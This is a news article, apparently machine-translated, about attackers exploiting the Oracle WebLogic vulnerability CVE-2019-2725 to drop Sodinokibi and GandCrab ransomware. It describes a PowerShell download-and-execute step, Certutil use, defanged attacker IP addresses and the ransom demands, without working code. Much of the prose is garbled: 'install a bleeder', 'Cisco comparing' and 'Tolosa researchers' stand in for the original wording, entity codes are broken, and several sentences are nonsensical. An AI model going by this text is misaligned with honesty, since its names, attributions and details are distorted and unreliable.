Attackers are actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic Server to install a bleeder, without a mouse or other interaction required by the end users, researchers from Cisco comparing said Tuesday.
Vulnerability and operation of the first exploit became public two weeks ago at the Chinese National data base of vulnerabilities, according to researchers from security training group SANS ISC, which has warned that a vulnerability has been under active attack. The vulnerability is easy to use and allow an attacker to execute code of their choice in the cloud. Because of their power, bandwidth, and use in cloud environments with a high level of security, those servers are considered targets with high added value. The disclosure prompted Oracle will release an emergency patch on Friday.
On Tuesday, researchers from Cisco comparing said CVE-2019-2725, since the vulnerability was indexed under active use at least April 21 since last Thursday, the day before Oracle armor zero-day vulnerabilities, attackers have begun to use exploits in the company to establish «Sodinokibi» new piece of ransomware. The annex to the encryption of data on the infected computer, the malware attempts to destroy the backup shadow copy to prevent the target from a simple restoration of the lost data. Ironically, about eight hours after infection, attackers are exploiting the same vulnerability to install another part of extortion, known as GandCrab.
It does not require interaction
"Historically, most varieties extortionists demanded some form of interaction with the user, such as a user opening an attachment in an email message by clicking on a malicious link or run a malicious program on the device," Tolosa researchers P & # 39; er Cadieux, Colin Grady, Jaeson Schultz, and Matt valites wrote in a post on Tuesday. "In this case, the attackers simply used the Oracle WebLogic vulnerability, causing the server to download a copy of the affected racketeers with the attacker control of IP-addresses 188.166.74[.]218 and 45.55.211[.]79. "
The vulnerability is easy to use because all that is required HTTP access to vulnerable WebLogic server. His assessment of the severity of a common vulnerability Scoring System 9.8 out of possible 10. forwards shipments vulnerable servers POST command containing the PowerShell command that downloads and executes malicious file with the name «radm.exe.» In addition to PowerShell, criminals also exploit the CVE-2019-2725 to use the command line utility Certutil. Other files that are downloaded and executed, and include office.exe untitled.exe.
Ransom note specified in subsection above, and in the full & # 39; below the amount required to pay the $ 2,500 goal on Bitcoin amount within two days to get the decryption key that will unlock the encrypted data. After this period, the redemption is doubled to $ 5,000 attackers provide instructions explaining how cryptocurrency beginners can create Bitcoin wallet and get digital currency, reaching recommends using Blockchain.info.
Attacks using different high day zero gravity in software, which is widely used in cloud environments. The combination of means of attack, is likely to continue. Organizations that use the WebLogic have to patch the main priority Friday.